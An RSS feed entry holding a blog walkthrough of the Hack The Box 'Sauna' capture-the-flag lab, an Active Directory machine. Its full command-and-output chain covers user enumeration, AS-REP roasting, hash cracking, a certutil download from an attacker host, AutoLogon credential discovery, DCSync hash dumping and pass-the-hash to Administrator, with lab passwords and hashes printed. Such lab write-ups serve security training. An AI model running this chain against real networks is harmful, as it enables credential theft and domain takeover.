<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Iftikhar Huseynov</title>
    <description>The latest articles on DEV Community by Iftikhar Huseynov (@iftikhar_911).</description>
    <link>https://dev.to/iftikhar_911</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4015093%2Ffdce4fe7-e0af-4ab7-b432-e015893f4b36.jpg</url>
      <title>DEV Community: Iftikhar Huseynov</title>
      <link>https://dev.to/iftikhar_911</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/iftikhar_911"/>
    <language>en</language>
    <item>
      <title>Sauna CTF HTB</title>
      <dc:creator>Iftikhar Huseynov</dc:creator>
      <pubDate>Sat, 04 Jul 2026 13:29:19 +0000</pubDate>
      <link>https://dev.to/iftikhar_911/sauna-ctf-htb-1lp0</link>
      <guid>https://dev.to/iftikhar_911/sauna-ctf-htb-1lp0</guid>
      <description>&lt;p&gt;Hi, what’s up, welcome to my page. Today we are going to solve the Sauna CTF on Hack The Box. This CTF is about Active Directory, which is very important.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Enumeration&lt;/strong&gt;&lt;br&gt;
&lt;code&gt;nmap -sV -sC 10.129.95.180&lt;br&gt;
Starting Nmap 7.98 ( https://nmap.org ) at 2026-07-03 13:16 -0400&lt;br&gt;
Nmap scan report for 10.129.95.180&lt;br&gt;
Host is up (0.21s latency).&lt;br&gt;
Not shown: 987 filtered tcp ports (no-response)&lt;br&gt;
PORT STATE SERVICE VERSION&lt;br&gt;
53/tcp open domain Simple DNS Plus&lt;br&gt;
80/tcp open http Microsoft IIS httpd 10.0&lt;br&gt;
|_http-server-header: Microsoft-IIS/10.0&lt;br&gt;
|_http-title: Egotistical Bank :: Home&lt;br&gt;
| http-methods: &lt;br&gt;
|_ Potentially risky methods: TRACE&lt;br&gt;
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-04 00:16:58Z)&lt;br&gt;
135/tcp open msrpc Microsoft Windows RPC&lt;br&gt;
139/tcp open netbios-ssn Microsoft Windows netbios-ssn&lt;br&gt;
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)&lt;br&gt;
445/tcp open microsoft-ds?&lt;br&gt;
464/tcp open kpasswd5?&lt;br&gt;
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0&lt;br&gt;
636/tcp open tcpwrapped&lt;br&gt;
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)&lt;br&gt;
3269/tcp open tcpwrapped&lt;br&gt;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)&lt;br&gt;
|_http-server-header: Microsoft-HTTPAPI/2.0&lt;br&gt;
|_http-title: Not Found&lt;br&gt;
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows&lt;br&gt;
Host script results:&lt;br&gt;
| smb2-time: &lt;br&gt;
| date: 2026-07-04T00:17:20&lt;br&gt;
|_ start_date: N/A&lt;br&gt;
|_clock-skew: 6h59m50s&lt;br&gt;
| smb2-security-mode: &lt;br&gt;
| 3.1.1: &lt;br&gt;
|_ Message signing enabled and required&lt;/code&gt;&lt;br&gt;
As we can see, we have LDAP, WinRM (for evil-winrm), SMB, HTTP, RPC and several more ports open.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;RPC port&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;rpcclient -U "" -N 10.129.95.180&lt;br&gt;
rpcclient $&amp;gt; enumdomusers&lt;br&gt;
result was NT_STATUS_ACCESS_DENIED&lt;br&gt;
rpcclient $&amp;gt; ^C&lt;/code&gt;&lt;br&gt;
We can’t use the RPC port without authentication.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SMB port&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;`smbclient -L //10.129.95.180 
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
 - - - - - - - - - - -
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.95.180 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 - no workgroup available`
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same thing: anonymous login succeeds, but no shares are listed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;LDAP&lt;/strong&gt;&lt;br&gt;
We have ports 88 and 636 open, so we can use ldapsearch for domain enumeration. Let’s start.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;`ldapsearch -x -H ldap://10.129.95.180 -s base -b "" "(objectClass=*)" namingContexts
&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;extended LDIF
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;extended LDIF
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;LDAPv3
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;base &amp;lt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; with scope baseObject
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;filter: &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;objectClass&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;requesting: namingContexts 
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="go"&gt;dn:
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;search result
&lt;span class="go"&gt;search: 2
result: 0 Success

&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;numResponses: 2
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;numEntries: 1&lt;span class="sb"&gt;`&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Domain controller: egotistical-bank.local. Nothing else of interest here.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;KERBEROS&lt;/strong&gt;&lt;br&gt;
Port 88 is open, so we can use the kerbrute tool to enumerate valid domain users. I’m using SecLists for usernames, but you can use any username wordlist.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;./kerbrute userenum -d egotistical-bank.local --dc 10.129.95.180 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,&amp;lt; /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/03/26 - Ronnie Flathers @ropnop

&lt;/span&gt;&lt;span class="gp"&gt;2026/07/03 13:31:29 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;Using KDC&lt;span class="o"&gt;(&lt;/span&gt;s&lt;span class="o"&gt;)&lt;/span&gt;:
&lt;span class="gp"&gt;2026/07/03 13:31:29 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;   &lt;/span&gt;10.129.95.180:88
&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;2026/07/03 13:32:09 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       administrator@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:35:45 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       hsmith@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:36:30 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       Administrator@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:38:47 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       fsmith@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:58:42 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       Fsmith@egotistical-bank.local
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We found 3 users: administrator, hsmith and fsmith.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AS-REP ROASTING&lt;/strong&gt;&lt;br&gt;
For these users, we can use the impacket script called GetNPUsers.py. This script lets us retrieve AS-REP hashes for accounts that don’t require Kerberos pre-authentication.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt; GetNPUsers.py 'egotistical-bank.local/' -usersfile /home/kali/Downloads/sauna.txt -format hashcat -outputfile saunaasrep.txt -dc-ip 10.129.95.180
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'GetNPUsers.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies 

[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt;krb5asrep&lt;span class="nv"&gt;$23$fsmith&lt;/span&gt;@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3&lt;span class="nv"&gt;$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&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We got fsmith’s hash.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cracking the hash&lt;/strong&gt;&lt;br&gt;
Hashcat helps us crack this hash.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;hashcat -m 18200 saunaasrep.txt /usr/share/wordlists/rockyou.txt --force&lt;br&gt;
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$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:Thestrokes23&lt;/code&gt;&lt;br&gt;
We found fsmith’s password.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gaining access with evil-winrm | PORT 5985&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;evil-winrm&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-i&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-u&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;password&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;evil-winrm&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-i&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;10.129.95.180&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-u&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;fsmith&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Thestrokes23&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;shell&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;v3.9&lt;/span&gt;&lt;span class="w"&gt;



&lt;/span&gt;&lt;span class="n"&gt;Info:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Establishing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;connection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;remote&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;endpoint&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;cd&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Desktop&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith\Desktop&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;dir&lt;/span&gt;&lt;span class="w"&gt;


    &lt;/span&gt;&lt;span class="n"&gt;Directory:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith\Desktop&lt;/span&gt;&lt;span class="w"&gt;


&lt;/span&gt;&lt;span class="n"&gt;Mode&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;LastWriteTime&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="nx"&gt;Length&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Name&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="o"&gt;-------------&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="o"&gt;------&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nt"&gt;-ar&lt;/span&gt;&lt;span class="o"&gt;---&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="mi"&gt;7&lt;/span&gt;&lt;span class="n"&gt;/3/2026&lt;/span&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="nx"&gt;5:14&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PM&lt;/span&gt;&lt;span class="w"&gt;             &lt;/span&gt;&lt;span class="nx"&gt;34&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;user.txt&lt;/span&gt;&lt;span class="w"&gt;



&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith\Desktop&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;user.txt&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;*******&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We got user.txt in the Desktop directory.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Privilege Escalation&lt;/strong&gt;&lt;br&gt;
First, we upload winPEAS to the victim machine to look for privilege escalation methods.&lt;/p&gt;

&lt;p&gt;On the attacker machine:&lt;/p&gt;

&lt;p&gt;Make sure you are in the directory that contains winPEAS.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;python3 -m http.server 80&lt;/code&gt;&lt;br&gt;
On the victim machine:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;certutil -urlcache -split -f http://&amp;lt;ATTACKER_IP&amp;gt;:80/winPEAS.exe winPEAS.exe&lt;/code&gt;&lt;br&gt;
We can then run winPEAS with &lt;code&gt;.\winPEAS.exe&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And there it is: AutoLogon credentials for the user svc_loanmanager.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;BloodHound&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Taking a look at BloodHound, we can see what svc_loanmanager can do. svc_loanmanager has 3 permissions: GetChangesAll, DCSync, GetChanges.&lt;/p&gt;

&lt;p&gt;With DCSync rights, we can use secretsdump to get the Administrator hash.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'secretsdump.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The hash has been found, but first we should make sure that we can log in with it. So we use crackmapexec to verify.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;crackmapexec smb 10.129.95.180 -u 'Administrator' --hash aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e &lt;br&gt;
SMB         10.129.95.180   445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)&lt;br&gt;
SMB         10.129.95.180   445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\Administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)&lt;br&gt;
&lt;/code&gt;Yeppp, we can use this hash to log in!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ROOT FLAG&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -dc-ip 10.129.95.180 Administrator@10.129.95.180&lt;/code&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;C:\Users&amp;gt; cd Administrator

C:\Users\Administrator&amp;gt; cd Desktop

C:\Users\Administrator\Desktop&amp;gt; dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\Administrator\Desktop

07/14/2021  03:35 PM    &amp;lt;DIR&amp;gt;          .
07/14/2021  03:35 PM    &amp;lt;DIR&amp;gt;          ..
07/03/2026  05:14 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,812,263,936 bytes free

C:\Users\Administrator\Desktop&amp;gt; type root.txt
*********
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;BINGOOO!!!! We got the root flag. Stay safe and goodbye.&lt;/p&gt;

</description>
      <category>ctf</category>
      <category>redteam</category>
      <category>cybersecurity</category>
    </item>
  </channel>
</rss>
